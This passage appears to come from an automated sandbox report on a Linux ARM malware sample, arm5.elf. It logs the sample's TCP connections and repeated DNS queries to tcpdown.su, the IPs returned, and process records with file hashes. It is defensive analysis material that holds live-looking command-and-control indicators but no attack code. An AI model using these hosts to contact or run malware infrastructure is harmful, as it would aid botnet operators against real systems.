                                                                Jan 1, 2025 18:43:40.098651886 CET382602601192.168.2.2345.200.149.249
                                                                Jan 1, 2025 18:43:40.103404999 CET26013826045.200.149.249192.168.2.23
                                                                Jan 1, 2025 18:43:40.103509903 CET382602601192.168.2.2345.200.149.249
                                                                Jan 1, 2025 18:43:40.108285904 CET26013826045.200.149.249192.168.2.23
                                                                Jan 1, 2025 18:43:40.910525084 CET26013826045.200.149.249192.168.2.23
                                                                Jan 1, 2025 18:43:40.910577059 CET382602601192.168.2.2345.200.149.249
                                                                Jan 1, 2025 18:43:40.912645102 CET382602601192.168.2.2345.200.149.249
                                                                Jan 1, 2025 18:43:46.633876085 CET571847722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:46.638799906 CET772257184107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:46.638861895 CET571847722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:46.645853996 CET571847722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:46.645941973 CET571847722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:46.650757074 CET772257184107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:46.651566029 CET571867722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:46.656419992 CET772257186107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:46.656469107 CET571867722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:46.657069921 CET571887722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:46.657746077 CET571867722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:46.657890081 CET571867722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:46.661855936 CET772257188107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:46.661914110 CET571887722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:46.662667990 CET772257186107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:46.671046972 CET571887722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:46.671442032 CET571887722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:46.675811052 CET772257188107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:46.697690010 CET772257184107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:46.705696106 CET772257186107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:46.721719980 CET772257188107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:47.010561943 CET772257184107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:47.010643959 CET571847722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:47.040998936 CET772257186107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:47.041075945 CET571867722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:47.047811985 CET772257188107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:47.047883034 CET571887722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:54.026984930 CET571907722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:54.031888962 CET772257190107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:54.031951904 CET571907722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:54.032538891 CET571907722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:54.032656908 CET571907722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:54.037324905 CET772257190107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:54.054766893 CET571927722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:54.059643030 CET772257192107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:54.059701920 CET571927722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:54.060172081 CET571927722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:54.060264111 CET571927722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:54.064965963 CET772257192107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:54.077624083 CET772257190107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:54.105635881 CET772257192107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:54.404808044 CET772257190107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:54.404901981 CET571907722192.168.2.23107.175.130.16
                                                                Jan 1, 2025 18:43:54.449580908 CET772257192107.175.130.16192.168.2.23
                                                                Jan 1, 2025 18:43:54.449646950 CET571927722192.168.2.23107.175.130.16

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 1, 2025 18:41:51.850375891 CET5539153192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:41:51.903927088 CET53553911.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:41:51.907958984 CET3846553192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:41:51.922914028 CET53384651.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:41:51.927316904 CET4425653192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:41:51.937905073 CET53442561.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:41:51.942147017 CET4485953192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:41:51.956844091 CET53448591.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:41:51.960887909 CET4206653192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:41:51.969356060 CET53420661.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:41:51.973228931 CET4633253192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:41:51.980648994 CET53463321.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:41:53.842782974 CET3462253192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:41:53.857692003 CET53346221.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:41:53.990464926 CET5934253192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:41:53.999193907 CET53593421.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:41:54.004759073 CET3338453192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:41:54.023999929 CET53333841.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:41:54.029618025 CET4993953192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:41:54.043948889 CET53499391.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:41:54.049535990 CET4349453192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:41:54.058978081 CET53434941.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:41:54.063947916 CET4137953192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:41:59.118921995 CET4471553192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:04.208918095 CET3464053192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:09.285598993 CET4972653192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:14.287208080 CET5950253192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:21.115993023 CET4967053192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:21.126318932 CET53496701.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:42:21.127804041 CET5268853192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:21.137248993 CET53526881.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:42:21.137945890 CET4017153192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:21.157525063 CET53401711.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:42:21.158468962 CET4875653192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:21.166654110 CET53487561.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:42:21.167526960 CET5212453192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:21.186357021 CET53521241.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:42:21.187066078 CET3447853192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:26.189352036 CET3648653192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:31.192994118 CET4911653192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:36.198400021 CET5133253192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:41.203279972 CET4799953192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:48.067626953 CET5088053192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:48.076771021 CET53508801.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:42:48.078293085 CET5378353192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:48.093544006 CET53537831.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:42:48.094773054 CET6095453192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:48.103879929 CET53609541.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:42:48.105190039 CET4252053192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:48.124653101 CET53425201.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:42:48.126611948 CET3879453192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:48.142113924 CET53387941.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:42:48.143018961 CET5728453192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:53.148087978 CET4160553192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:42:58.152854919 CET5696153192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:03.156769037 CET3419553192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:08.159619093 CET3369553192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:14.992410898 CET4454153192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:15.013261080 CET53445411.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:43:15.014354944 CET5898153192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:15.036716938 CET53589811.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:43:15.037476063 CET3633953192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:15.045126915 CET53363391.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:43:15.045986891 CET3314053192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:15.059832096 CET53331401.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:43:15.060818911 CET3903353192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:15.067897081 CET53390331.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:43:15.068955898 CET4617153192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:20.073808908 CET3700953192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:25.080054998 CET5963553192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:30.085334063 CET5889053192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:35.087727070 CET5956253192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:41.914494991 CET4673853192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:41.933319092 CET53467381.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:43:41.934330940 CET4983753192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:41.946636915 CET53498371.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:43:41.948038101 CET4259253192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:41.955744028 CET53425921.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:43:41.956731081 CET5601253192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:41.970911980 CET53560121.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:43:41.971892118 CET5609653192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:41.981147051 CET53560961.1.1.1192.168.2.23
                                                                Jan 1, 2025 18:43:41.982100964 CET5548053192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:46.986120939 CET5416253192.168.2.231.1.1.1
                                                                Jan 1, 2025 18:43:51.989429951 CET5299653192.168.2.231.1.1.1

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Jan 1, 2025 18:41:51.850375891 CET192.168.2.231.1.1.10x5af3Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:51.907958984 CET192.168.2.231.1.1.10xd64Standard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:51.927316904 CET192.168.2.231.1.1.10xd64Standard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:51.942147017 CET192.168.2.231.1.1.10xd64Standard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:51.960887909 CET192.168.2.231.1.1.10xd64Standard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:51.973228931 CET192.168.2.231.1.1.10xd64Standard query (0)tcpdown.su|1A (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:53.842782974 CET192.168.2.231.1.1.10x46a2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:53.990464926 CET192.168.2.231.1.1.10x46a2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:54.004759073 CET192.168.2.231.1.1.10x46a2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:54.029618025 CET192.168.2.231.1.1.10x46a2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:54.049535990 CET192.168.2.231.1.1.10x46a2Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:54.063947916 CET192.168.2.231.1.1.10x32aeStandard query (0)tcpdown.suo. [malformed]256355false
                                                                Jan 1, 2025 18:41:59.118921995 CET192.168.2.231.1.1.10x32aeStandard query (0)tcpdown.suo. [malformed]256359false
                                                                Jan 1, 2025 18:42:04.208918095 CET192.168.2.231.1.1.10x32aeStandard query (0)tcpdown.suo. [malformed]256364false
                                                                Jan 1, 2025 18:42:09.285598993 CET192.168.2.231.1.1.10x32aeStandard query (0)tcpdown.suo. [malformed]256369false
                                                                Jan 1, 2025 18:42:14.287208080 CET192.168.2.231.1.1.10x32aeStandard query (0)tcpdown.suo. [malformed]256374false
                                                                Jan 1, 2025 18:42:21.115993023 CET192.168.2.231.1.1.10x9e6Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:21.127804041 CET192.168.2.231.1.1.10x9e6Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:21.137945890 CET192.168.2.231.1.1.10x9e6Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:21.158468962 CET192.168.2.231.1.1.10x9e6Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:21.167526960 CET192.168.2.231.1.1.10x9e6Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:21.187066078 CET192.168.2.231.1.1.10x9995Standard query (0)tcpdown.suo. [malformed]256381false
                                                                Jan 1, 2025 18:42:26.189352036 CET192.168.2.231.1.1.10x9995Standard query (0)tcpdown.suo. [malformed]256388false
                                                                Jan 1, 2025 18:42:31.192994118 CET192.168.2.231.1.1.10x9995Standard query (0)tcpdown.suo. [malformed]256396false
                                                                Jan 1, 2025 18:42:36.198400021 CET192.168.2.231.1.1.10x9995Standard query (0)tcpdown.suo. [malformed]256398false
                                                                Jan 1, 2025 18:42:41.203279972 CET192.168.2.231.1.1.10x9995Standard query (0)tcpdown.suo. [malformed]256406false
                                                                Jan 1, 2025 18:42:48.067626953 CET192.168.2.231.1.1.10x6b91Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:48.078293085 CET192.168.2.231.1.1.10x6b91Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:48.094773054 CET192.168.2.231.1.1.10x6b91Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:48.105190039 CET192.168.2.231.1.1.10x6b91Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:48.126611948 CET192.168.2.231.1.1.10x6b91Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:48.143018961 CET192.168.2.231.1.1.10x100cStandard query (0)tcpdown.suo. [malformed]256412false
                                                                Jan 1, 2025 18:42:53.148087978 CET192.168.2.231.1.1.10x100cStandard query (0)tcpdown.suo. [malformed]256414false
                                                                Jan 1, 2025 18:42:58.152854919 CET192.168.2.231.1.1.10x100cStandard query (0)tcpdown.suo. [malformed]256421false
                                                                Jan 1, 2025 18:43:03.156769037 CET192.168.2.231.1.1.10x100cStandard query (0)tcpdown.suo. [malformed]256428false
                                                                Jan 1, 2025 18:43:08.159619093 CET192.168.2.231.1.1.10x100cStandard query (0)tcpdown.suo. [malformed]256429false
                                                                Jan 1, 2025 18:43:14.992410898 CET192.168.2.231.1.1.10x5ef6Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:15.014354944 CET192.168.2.231.1.1.10x5ef6Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:15.037476063 CET192.168.2.231.1.1.10x5ef6Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:15.045986891 CET192.168.2.231.1.1.10x5ef6Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:15.060818911 CET192.168.2.231.1.1.10x5ef6Standard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:15.068955898 CET192.168.2.231.1.1.10x64daStandard query (0)tcpdown.suo. [malformed]256436false
                                                                Jan 1, 2025 18:43:20.073808908 CET192.168.2.231.1.1.10x64daStandard query (0)tcpdown.suo. [malformed]256444false
                                                                Jan 1, 2025 18:43:25.080054998 CET192.168.2.231.1.1.10x64daStandard query (0)tcpdown.suo. [malformed]256450false
                                                                Jan 1, 2025 18:43:30.085334063 CET192.168.2.231.1.1.10x64daStandard query (0)tcpdown.suo. [malformed]256451false
                                                                Jan 1, 2025 18:43:35.087727070 CET192.168.2.231.1.1.10x64daStandard query (0)tcpdown.suo. [malformed]256459false
                                                                Jan 1, 2025 18:43:41.914494991 CET192.168.2.231.1.1.10x13aaStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:41.934330940 CET192.168.2.231.1.1.10x13aaStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:41.948038101 CET192.168.2.231.1.1.10x13aaStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:41.956731081 CET192.168.2.231.1.1.10x13aaStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:41.971892118 CET192.168.2.231.1.1.10x13aaStandard query (0)tcpdown.suA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:41.982100964 CET192.168.2.231.1.1.10xd7c6Standard query (0)tcpdown.suo. [malformed]256466false
                                                                Jan 1, 2025 18:43:46.986120939 CET192.168.2.231.1.1.10xd7c6Standard query (0)tcpdown.suo. [malformed]256467false
                                                                Jan 1, 2025 18:43:51.989429951 CET192.168.2.231.1.1.10xd7c6Standard query (0)tcpdown.suo. [malformed]256474false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Jan 1, 2025 18:41:51.903927088 CET1.1.1.1192.168.2.230x5af3No error (0)tcpdown.su45.200.149.249A (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:51.903927088 CET1.1.1.1192.168.2.230x5af3No error (0)tcpdown.su45.200.149.95A (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:51.903927088 CET1.1.1.1192.168.2.230x5af3No error (0)tcpdown.su23.94.242.130A (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:51.903927088 CET1.1.1.1192.168.2.230x5af3No error (0)tcpdown.su23.94.37.42A (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:51.903927088 CET1.1.1.1192.168.2.230x5af3No error (0)tcpdown.su104.168.33.8A (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:51.903927088 CET1.1.1.1192.168.2.230x5af3No error (0)tcpdown.su45.200.149.167A (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:51.903927088 CET1.1.1.1192.168.2.230x5af3No error (0)tcpdown.su45.200.149.96A (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:51.922914028 CET1.1.1.1192.168.2.230xd64Name error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:51.937905073 CET1.1.1.1192.168.2.230xd64Name error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:51.956844091 CET1.1.1.1192.168.2.230xd64Name error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:51.969356060 CET1.1.1.1192.168.2.230xd64Name error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:51.980648994 CET1.1.1.1192.168.2.230xd64Name error (3)tcpdown.su|1nonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:53.857692003 CET1.1.1.1192.168.2.230x46a2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:53.999193907 CET1.1.1.1192.168.2.230x46a2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:54.023999929 CET1.1.1.1192.168.2.230x46a2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:54.043948889 CET1.1.1.1192.168.2.230x46a2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:41:54.058978081 CET1.1.1.1192.168.2.230x46a2Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:21.126318932 CET1.1.1.1192.168.2.230x9e6Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:21.137248993 CET1.1.1.1192.168.2.230x9e6Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:21.157525063 CET1.1.1.1192.168.2.230x9e6Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:21.166654110 CET1.1.1.1192.168.2.230x9e6Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:21.186357021 CET1.1.1.1192.168.2.230x9e6Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:48.076771021 CET1.1.1.1192.168.2.230x6b91Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:48.093544006 CET1.1.1.1192.168.2.230x6b91Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:48.103879929 CET1.1.1.1192.168.2.230x6b91Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:48.124653101 CET1.1.1.1192.168.2.230x6b91Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:42:48.142113924 CET1.1.1.1192.168.2.230x6b91Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:15.013261080 CET1.1.1.1192.168.2.230x5ef6Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:15.036716938 CET1.1.1.1192.168.2.230x5ef6Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:15.045126915 CET1.1.1.1192.168.2.230x5ef6Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:15.059832096 CET1.1.1.1192.168.2.230x5ef6Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:15.067897081 CET1.1.1.1192.168.2.230x5ef6Name error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:41.933319092 CET1.1.1.1192.168.2.230x13aaName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:41.946636915 CET1.1.1.1192.168.2.230x13aaName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:41.955744028 CET1.1.1.1192.168.2.230x13aaName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:41.970911980 CET1.1.1.1192.168.2.230x13aaName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false
                                                                Jan 1, 2025 18:43:41.981147051 CET1.1.1.1192.168.2.230x13aaName error (3)tcpdown.sunonenoneA (IP address)IN (0x0001)false

                                                                System Behavior

                                                                General

                                                                Start time (UTC):17:41:46
                                                                Start date (UTC):01/01/2025
                                                                Path:/usr/bin/dash
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:46
                                                                Start date (UTC):01/01/2025
                                                                Path:/usr/bin/rm
                                                                Arguments:rm -f /tmp/tmp.s3f1DOFraO /tmp/tmp.INBspAWO6B /tmp/tmp.AXSB26qnlD
                                                                File size:72056 bytes
                                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:46
                                                                Start date (UTC):01/01/2025
                                                                Path:/usr/bin/dash
                                                                Arguments:-
                                                                File size:129816 bytes
                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:46
                                                                Start date (UTC):01/01/2025
                                                                Path:/usr/bin/rm
                                                                Arguments:rm -f /tmp/tmp.s3f1DOFraO /tmp/tmp.INBspAWO6B /tmp/tmp.AXSB26qnlD
                                                                File size:72056 bytes
                                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:48
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:/tmp/arm5.elf
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:48
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:48
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:57
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:57
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:57
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:57
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:57
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:41:57
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:02
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:02
                                                                Start date (UTC):01/01/2025
                                                                Path:/tmp/arm5.elf
                                                                Arguments:-
                                                                File size:4956856 bytes
                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                Chronological Activities


                                                                General

                                                                Start time (UTC):17:42:07
